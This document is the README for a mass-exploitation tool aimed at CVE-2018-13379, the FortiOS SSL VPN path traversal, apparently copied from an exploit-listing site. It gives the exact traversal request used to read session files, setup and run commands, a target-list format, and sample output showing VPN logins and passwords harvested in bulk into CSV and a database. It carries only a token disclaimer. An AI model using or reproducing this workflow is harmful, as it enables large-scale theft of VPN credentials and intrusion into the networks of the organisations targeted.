Share
## https://sploitus.com/exploit?id=1BD01929-4022-5FDD-91DB-F38A3D59355B
![preview](3.PNG)



# CVE-2018-13379 โ€” Mass Exploit for Fortinet FortiOS SSL VPN
A tool for mass exploitation of the CVE-2018-13379 (path traversal) vulnerability in Fortinet FortiOS SSL VPN. Allows reading session files and extracting logins and passwords in cleartext.
## Features
- Exploitation of CVE-2018-13379 via the `/remote/fgt_lang` endpoint
- Multithreading (20 threads by default)
- Instant saving of found credentials to CSV and PostgreSQL
- Dynamic table names in PostgreSQL with a timestamp (`fortios_creds_20250120_143052`)
- No warnings - just the results
## Installation
```bash
git clone https://github.com/yourusername/cve-2018-13379-mass.git
cd cve-2018-13379-mass
pip3 install requests psycopg2-binary
```

## Configuration
All settings are editable directly in the script - no fiddling with command line arguments lines:

```python
TARGETS_FILE = "targets.txt" # File with targets (ip:port)
CSV_FILE = "fortios_creds.csv" # Output CSV file
```
## PostgreSQL (optional - the script works without a database)
```
PG_HOST = "127.0.0.1"
PG_PORT = 5432
PG_DB = "fortios_db"
PG_USER = "postgres"
PG_PASSWORD = "password"
THREADS = 20
TIMEOUT = 8
```
## Usage

1. Create a file `targets.txt` with targets, one per line:

```text
192.168.1.1:8443
10.0.0.5:10443
172.16.0.1:443
```
2. Run the script:
```bash
python3 exploit.py
```
## Results

- **CSV file** โ€” all found credentials with timestamps
- **PostgreSQL table** โ€” a new table is created on each run (`fortios_creds_YYYYMMDD_HHMMSS`)

Example output:
```text
[+] 100 targets loaded. We're running in 20 threads...
[+] LEAKED: 192.168.1.1:8443
โ†’ Pulled 3 credentials
Wrote 3 credentials to CSV
3 credentials entered into the DB
[-] Not leaky: 10.0.0.1:10443
```

## How it works
1. A GET request is sent to the address `https://ip:port/remote/fgt_lang?lang=/../../../..///////////dev/cmdb/sslvpn_websession`
2. The response is checked to see if it contains the string `var fgt_lang` (a sign of vulnerability)
3. The `username` and `password` pairs are extracted from the binary response
4. The found data is immediately saved to CSV and PostgreSQL
5. Script moves to the next target.

## Requirements

- Python 3.6+
- `requests`
- `psycopg2-binary` (optional - only CSV files work without it)
- `urllib3`

## Warning
This tool is intended for educational purposes and authorized testing. You are responsible for your own actions.
## Acknowledgments

- Original vulnerability discovered by Meh Chang
- Exploitation logic is based on publicly available research

## License

Unlicense - do whatever you want.